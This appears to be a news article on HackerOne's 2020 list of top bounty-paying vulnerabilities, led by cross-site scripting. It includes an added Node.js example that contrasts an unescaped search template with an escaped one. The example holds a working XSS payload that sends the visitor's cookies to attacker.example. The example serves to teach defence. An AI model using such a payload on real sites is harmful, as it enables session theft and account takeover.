Cross-site scripting (XSS) has taken the cake in 2020 as the most impactful vulnerability, and thus the one paying out the highest rewards to ethical hackers, for the second year in a row. That is according to the Top 10 Vulnerabilities list released on Thursday by HackerOne.
The vulnerability, which lets attackers inject client-side scripts into web pages viewed by other users, earned hackers $4.2 million in bug-bounty awards over the last year, a 26 percent increase over what was paid out for XSS flaws in 2019, according to the report.
Following XSS on the top 10 list were information disclosure, server-side request forgery (SSRF), insecure direct object reference (IDOR), privilege escalation, SQL injection, improper authentication, code injection and cross-site request forgery (CSRF).
All told, companies paid ethical hackers $23.5 million in bug bounties for these flaws this year, according to HackerOne, which maintains a database of 200,000 vulnerabilities found by hackers.
Attackers can use XSS vulnerabilities to take over users' online accounts and steal PII, including passwords, bank account numbers, credit-card details, Social Security numbers and the like. Although XSS flaws account for 18 percent of all reported vulnerabilities, ethical hackers are actually underpaid for finding them, according to HackerOne.
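To make the injection the article describes concrete, the following is an added example (not code from the HackerOne report or from this article) of a reflected XSS in a hypothetical search page, shown next to an output-escaped version of the same handler. The function names, the `attacker.example` host and the payload are all assumptions constructed for the demonstration; it runs under Node.js with no dependencies.

```javascript
// Added example, not from the article or the HackerOne report.
// A minimal server-side template for a hypothetical search page: the
// vulnerable version interpolates the user-supplied query straight into HTML.
function renderSearchUnsafe(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// Hardened version: HTML-escape the five characters that can switch the
// parser out of text context before the value reaches the page.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSearchSafe(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// Crude check used only for this demo: does the rendered response contain a
// live <script> element? (A real scanner would parse the DOM rather than regex it.)
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed payload of the kind a bounty report would carry: it sends the
// victim's cookies to an attacker-controlled host (hypothetical domain).
const PAYLOAD =
  '<script>fetch("https://attacker.example/?c=" + encodeURIComponent(document.cookie))</script>';

// Render both variants with the same payload and report what happened.
function demo(payload = PAYLOAD) {
  const unsafe = renderSearchUnsafe(payload);
  const safe = renderSearchSafe(payload);
  return {
    unsafe,
    safe,
    unsafeHasScript: containsScriptTag(unsafe), // true: payload executes in the victim's browser
    safeHasScript: containsScriptTag(safe),     // false: payload is shown as inert text
  };
}

if (typeof require !== "undefined" && require.main === module) {
  const result = demo();
  console.log("vulnerable:", result.unsafe);
  console.log("escaped:   ", result.safe);
  console.log("script executes?", result.unsafeHasScript, "/", result.safeHasScript);
}
```

Escaping on output is the fix for this HTML-text context; a value placed inside an attribute, a `<script>` block or a URL needs the encoding for that context instead. Marking session cookies `HttpOnly` blunts the cookie-theft payload shown here, but an injected script can still drive the application as the logged-in user, which is why XSS reports so often translate into the account takeovers the article mentions.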
“Indeed, even large tech companies who were historically resistant to being transparent about their product’s security protocols have warmed to the idea of awarding ethical hackers for their work. Both Apple and ByteDance’s TikTok rolled out public, award-based bug-bounty programs in the last 12 months.”